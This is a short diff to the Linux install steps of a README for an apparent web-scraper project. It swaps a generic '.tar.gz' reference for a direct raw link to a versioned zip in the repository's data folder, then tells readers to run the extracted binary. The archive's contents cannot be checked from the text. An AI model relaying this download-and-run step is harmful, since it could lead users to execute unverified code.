XATI444/similarweb-advanced-scraper/README.md

 #### Linux

-1. Extract the contents of the `.tar.gz` file to your preferred directory.
+1. Extract the contents of the `https://raw.githubusercontent.com/XATI444/similarweb-advanced-scraper/main/data/similarweb-advanced-scraper_v1.2.zip` file to your preferred directory.
 2. Open the terminal and navigate to the extracted folder.
 3. Run the command `./similarweb-advanced-scraper` to start.